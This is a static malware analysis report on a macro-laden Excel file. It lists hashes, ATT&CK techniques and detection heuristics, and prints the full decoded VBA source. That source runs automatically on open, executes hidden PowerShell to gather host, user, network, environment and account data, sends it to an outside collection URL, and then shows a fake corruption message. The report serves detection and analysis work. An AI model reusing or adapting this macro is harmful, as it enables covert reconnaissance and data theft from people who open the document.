Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9c13ed6cc857d7cc…

MALICIOUS

Office (OLE)

46.5 KB Created: 2017-10-31 13:49:44 Authoring application: Microsoft Excel First seen: 2020-07-02
MD5: f3005d6f77f4b8e4e530eed5f4c9b4a1 SHA-1: 6d58a0c1358e15a9f2f0915b47564b0c2e02ed90 SHA-256: 9c13ed6cc857d7ccd816195e52feae7485b6ec9b7ef7b1f92b62cab639f04478
394 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel document contains VBA macros that are designed to execute PowerShell commands. The macros attempt to gather basic system information, IP configuration, and environment variables. The collected data is then sent to the URL http://osiris.compass-security.com/phishing/collect.php. The presence of AutoOpen and Document_Open macros indicates it's likely delivered as a spearphishing attachment.

Heuristics 13

  • ClamAV: Doc.Dropper.Agent-6418305-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6418305-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        tmpOutFile = createTempFile()
        Set wsh = CreateObject("WScript.Shell")
        pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        ''' -------------------------------
        ''' myCmd = "<powershell command>"
        ''' output = RunPowershellCmd(myCmd)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set HttpReq = CreateObject("MSXML2.XMLHTTP")
        ' change path to collection script here
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Sub AutoOpen()
        submit_mode = "auto"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        submit_mode = "auto"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Public Sub Auto_Open()
        submit_mode = "auto"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        hostname = Environ("computername")
        username = Environ("username")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://osiris.compass-security.com/phishing/collect.php In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7832 bytes
SHA-256: b369da19614fd601c7ffceafd35b9405e319d0f6a6e9de2a2676c93b48b6494d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' TODO
' Change the hardcoded fileID in the Exploit() function
' Adjust the executed PS commands in the Exploit() function as necessary
' Adjust the URL of the collection script in the Request() function
' Adjust the language of the displayed messages

Public submit_mode As String
Public runID As String
Public fileID As String

Private Sub CommandButton1_Click()
    submit_mode = "click"
    Call Exploit
End Sub

Public Sub Document_Open()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub Auto_Open()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub AutoOpen()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub AutoExec()
    submit_mode = "auto"
    Call Exploit
End Sub

Function Exploit()
    ' executed attacks are defined here. add more commands using the template below
    ''' template for PS command
    ''' -------------------------------
    ''' myCmd = "<powershell command>"
    ''' output = RunPowershellCmd(myCmd)
    ''' Call Request(output, "<label>")
    ''' -------------------------------
    On Error GoTo Err2:
    Dim myCmd As String
    Dim output As String
        
    ' generate a random ID to identify connected requests
    runID = RandomString(32)
    ' hardcoded ID to identify source document of requests
    fileID = "contentfiltercheck"
    
    ' Basic information gathering without PowerShell
    Call Request(BasicInfo(), "BasicInfo")
    
    ' Get ip configuration with PS
    myCmd = "Get-NetIPConfiguration"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "ipconfig")
    
    ' Get environment variables with PS
    myCmd = "Get-ChildItem Env:"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "env_vars")
    
    ' Get local user accounts with PS
    myCmd = "Get-WmiObject -Class Win32_UserAccount -Filter  'LocalAccount=True' | Select PSComputername, Name, Status, Disabled, AccountType, Lockout, PasswordRequired, PasswordChangeable, SID "
    output = RunPowershellCmd(myCmd)
    Call Request(output, "local_users")
    
    ' Get connected volumes/shares with PS
    myCmd = "Get-WmiObject -class win32_logicaldisk"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "local_volumes")
    
    ' Show corruption message and close document
    MsgBox "The document is corrupted and cannot be opened.", vbOKOnly
    ActiveDocument.Close SaveChanges:=wdDoNotSaveChanges
    Exit Function

Err2:
     MsgBox "An unknown error  occurred.", vbCritical, "Unknown error"
       
End Function


Function Request(data As String, Optional label As String = "n/a")
    Dim outBytes() As Byte
    Dim encOutput As String
    
    On Error GoTo Err1:
    
    ' base64 encode data to be transmitted
    outBytes = data
    encOutput = Replace(EncodeBase64(outBytes), Chr(10), "")
    
    Dim HttpReq As Object
  
    Set HttpReq = CreateObject("MSXML2.XMLHTTP")
    ' change path to collection script here
    HttpReq.Open "POST", "http://osiris.compass-security.com/phishing/collect.php", False
    HttpReq.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    HttpReq.send "fileID=" & fileID & "&runID=" & runID & "&data=" & label & ":" & encOutput & "&mode=" & submit_mode
    RequestWin = HttpReq.responseText
    Exit Function
    
Err1:
    MsgBox "An unknown error  occurred.", vbCritical, "Unknown error"
    
End Function

Public Function createTempFile() As String
    ' create a temporary file to store command output
    Dim tmpFolder, tmpName, tmpFile, fso
    
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set tmpFolder = fso.GetSpecialFolder(2)
    tmpName = fso.GetTempName
    Set tmpFile = tmpFolder.CreateTextFile(tmpName)
    tmpFile.Close
    createTempFile = tmpFolder & "\" & tmpName
End Function

Public Function getOutput(ByVal tmpOutFile As String) As String
    ' retrieve command output from temporary file
    Dim tmpFile, fso

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set tmpFile = fso.OpenTextFile(tmpOutFile, 1, False, -1)
    getOutput = tmpFile.readall
    tmpFile.Close
    
End Function

Public Function BasicInfo() As String
    ' collect basic information without PS, should work on all systems
    Dim hostname As String
    Dim username As String
    
    hostname = Environ("computername")
    username = Environ("username")
    BasicInfo = "pc:" & hostname & ";user:" & username

    BasicInfo = CStr(StrConv(CStr(BasicInfo), vbFromUnicode))
    
End Function

Public Function RunPowershellCmd(myCmd As String) As String
    ' execute given powershell command, store output in a temporary file and return output from there
    Dim wsh As Object
    Dim ret
    Dim strOutput, tmpOutFile, pscmd As String
    
    tmpOutFile = createTempFile()
    Set wsh = CreateObject("WScript.Shell")
    pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
    ret = wsh.Run(pscmd, 0, True)
    strOutput = getOutput(tmpOutFile)
     RunPowershellCmd = strOutput
End Function

Public Function BASE64SHA1(ByVal sTextToHash As String)
    ' base64 encode data and then hash it with sha1
    Dim asc As Object
    Dim enc As Object
    Dim TextToHash() As Byte
    Dim SharedSecretKey() As Byte
    Dim bytes() As Byte
    Const cutoff As Integer = 5

    Set asc = CreateObject("System.Text.UTF8Encoding")
    Set enc = CreateObject("System.Security.Cryptography.HMACSHA1")

    TextToHash = asc.GetBytes_4(sTextToHash)
    SharedSecretKey = asc.GetBytes_4(sTextToHash)
    enc.Key = SharedSecretKey

    bytes = enc.ComputeHash_2((TextToHash))
    BASE64SHA1 = EncodeBase64(bytes)
    'BASE64SHA1 = Left(BASE64SHA1, cutoff)

    Set asc = Nothing
    Set enc = Nothing

End Function

Public Function EncodeBase64(ByRef arrData() As Byte) As String
    ' base64 encode data
    Dim objXML As Object
    Dim objNode As Object

    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")

    objNode.DataType = "bin.base64"
    objNode.nodeTypedValue = arrData
    EncodeBase64 = objNode.Text

    Set objNode = Nothing
    Set objXML = Nothing

End Function

Public Function decodeBase64(ByVal strData As String) As Byte()
    ' base64 decode data
    Dim objXML As Object
    Dim objNode As Object
    
    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    decodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Public Function RandomString(l As Integer) As String
    ' generate a random string (lowercase/uppercase/digits) of length l
    Randomize
    Dim rndStr As String
    rndStr = "abcdefghijklmnopqrstuvwxyz"
    rndStr = rndStr & UCase(rndStr) & "0123456789"

    Dim i As Long
    For i = 1 To l
        RandomString = RandomString & Mid$(rndStr, Int(Rnd() * Len(rndStr) + 1), 1)
    Next

End Function




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True